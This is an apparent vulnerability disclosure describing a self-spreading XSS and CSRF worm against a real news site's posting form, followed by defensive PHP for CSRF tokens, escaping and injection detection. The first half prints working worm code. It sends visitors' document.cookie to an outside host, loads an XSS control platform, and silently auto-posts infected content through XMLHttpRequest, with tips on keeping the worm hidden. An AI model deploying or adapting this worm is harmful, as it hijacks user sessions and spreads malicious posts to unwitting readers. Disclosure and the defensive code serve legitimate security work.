Caijing website XSS Worm
Worm = XSS + csrf
Address: http://tnew.caijing.com.cn/
First, posting: the form submits four parameters directly with no token verification, which gives a CSRF vulnerability.
Second, stored XSS: the post content is not filtered, which gives an XSS vulnerability.
Next, a sketch of how the worm would spread:
------------------------------
Suppose a post contains <script src='http://wooyun.org/test.js'>, and the content of test.js is:

    // load the auto-posting JS that spreads the worm
    document.write('<script src="http://wooyun.org/fatie.php?cookie=' + document.cookie + '"><\/script>');
    // load the JS file of the XSS receiving platform, e.g. BeEF
    document.write('<script src="http://wooyun.org/xss.js"><\/script>');

In this way, both the auto-posting JS and the XSS platform's JS are loaded into the page.
When a user views the page, it loads: http://wooyun.org/fatie.php?cookie=(cookie content)
The content of fatie.php is roughly as follows.
The site's cookie contains cmstop_username, which holds the user name. fatie.php takes the user name from the cookie it receives and checks the database to see whether this is the user's first infection. If so, the user name is written to the database so that the user does not post again once the worm has run, and the site returns JS that performs the automatic posting. The returned JS is roughly as follows:

    // The article title and content can be collected and stored in the database with PHP,
    // so that each infected user sends a different article to infect other people
    var title = "url-encoded title";
    var content = "url-encoded article content containing the xss code";
    if (window.XMLHttpRequest) {
        var x = new XMLHttpRequest();
    } else {
        var MSXML = new Array('msxml2.XMLHTTP.5.0', 'msxml2.XMLHTTP.4.0', 'msxml2.XMLHTTP.3.0', 'msxml2.XMLHTTP', 'Microsoft.XMLHTTP');
        for (var n = 0; n < MSXML.length; n++) {
            try {
                var objXMLHTTP = new ActiveXObject(MSXML[n]);
                break;
            } catch (e) {}
        }
    }
    objXMLHTTP.open("POST", "http://tnew.caijing.com.cn/Articles/add", false);
    objXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    objXMLHTTP.setRequestHeader("Connection", "Keep-Alive");
    objXMLHTTP.send("title=" + title + "&content=" + content + "&g_name=%E5%90%E6%A7%BD&g_id=4&cate_id=23&cate_name=%E6%97%A0%E4%B8%BB%E9%A2%98");

In this way the XSS spreads. Each infected user sends only one post, which keeps the worm hidden.
As for xss.js, it simply loads the XSS platform's script.
Solution:
Enhanced Filtering
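As an added defensive example (this is not the site's code nor CMSTop's; the function names, the csrf_token form field and the $session array are assumptions), the following PHP shows the two server-side changes that close both halves of the worm described above: a per-session CSRF token checked on the /Articles/add handler, so the worm's background XMLHttpRequest (which carries the cookie but cannot read the token) is rejected, and HTML escaping plus a script-pattern check on the title and content before storage, so an injected <script src=...> is rendered as text rather than executed.

```php
<?php
// Added example (not the site's or CMSTop's own code): hardened handler for an
// "add article" endpoint such as /Articles/add. handle_add_article, csrf_token,
// the csrf_token form field and the $session array are assumed names.

declare(strict_types=1);

// ---- CSRF protection ---------------------------------------------------------

/** Return the session's CSRF token, creating a 256-bit random one on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True only if the submitted token matches the session token (constant-time compare). */
function csrf_valid(array $session, ?string $submitted): bool
{
    if (empty($session['csrf_token']) || $submitted === null) {
        return false;
    }
    return hash_equals($session['csrf_token'], $submitted);
}

// ---- Content filtering -------------------------------------------------------

/** Escape user text so browsers render it literally instead of as markup. */
function escape_html(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Coarse heuristic for script injection, used to log and reject; escaping is the real defence. */
function looks_like_script_injection(string $text): bool
{
    return (bool) preg_match('/<\s*script\b|javascript\s*:|\bon[a-z]+\s*=/i', $text);
}

// ---- Request handler ---------------------------------------------------------

/**
 * Handle an "add article" POST. $post is the decoded form body, $session the
 * server-side session. Returns [http_status, message, stored_record_or_null].
 */
function handle_add_article(array $post, array &$session): array
{
    if (!csrf_valid($session, $post['csrf_token'] ?? null)) {
        return [403, 'CSRF token missing or invalid', null];
    }
    $title   = trim((string) ($post['title'] ?? ''));
    $content = (string) ($post['content'] ?? '');
    if ($title === '' || $content === '') {
        return [400, 'title and content are required', null];
    }
    if (looks_like_script_injection($title) || looks_like_script_injection($content)) {
        // Worth logging: the worm above is exactly this pattern, one post per user.
        error_log('rejected post with script-like content from user ' . ($session['user'] ?? '?'));
        return [400, 'active content is not allowed in posts', null];
    }
    // Store the escaped form so later rendering is safe even if a template forgets to escape.
    $record = [
        'user'    => $session['user'] ?? 'anonymous',
        'title'   => escape_html($title),
        'content' => escape_html($content),
    ];
    return [201, 'created', $record];
}

// ---- Demonstration with constructed input -------------------------------------

$session = ['user' => 'alice'];
$token = csrf_token($session);

// 1. The worm's background request: has the session cookie, but no token.
$wormPost = ['title' => 'hi', 'content' => '<script src="http://example.invalid/x.js"></script>'];
[$status, $msg] = handle_add_article($wormPost, $session);
echo "worm request: $status $msg\n";   // 403 CSRF token missing or invalid

// 2. A legitimate form submission carrying the token from the rendered page.
$goodPost = ['csrf_token' => $token, 'title' => 'Hello', 'content' => 'Rates rose 1% today <b>bold</b>'];
[$status, $msg, $rec] = handle_add_article($goodPost, $session);
echo "legit request: $status $msg -> " . $rec['content'] . "\n";
// 201 created -> Rates rose 1% today &lt;b&gt;bold&lt;/b&gt;
```

The token must be embedded in the posting form (a hidden field) and never readable from the cookie, otherwise the worm's document.cookie step would hand it over; marking the session cookie HttpOnly additionally blocks the cookie exfiltration shown in test.js. The log line from the rejection branch is the signal a SOC would watch for: many distinct users each rejected once within a short window matches the one-post-per-user behaviour the report describes.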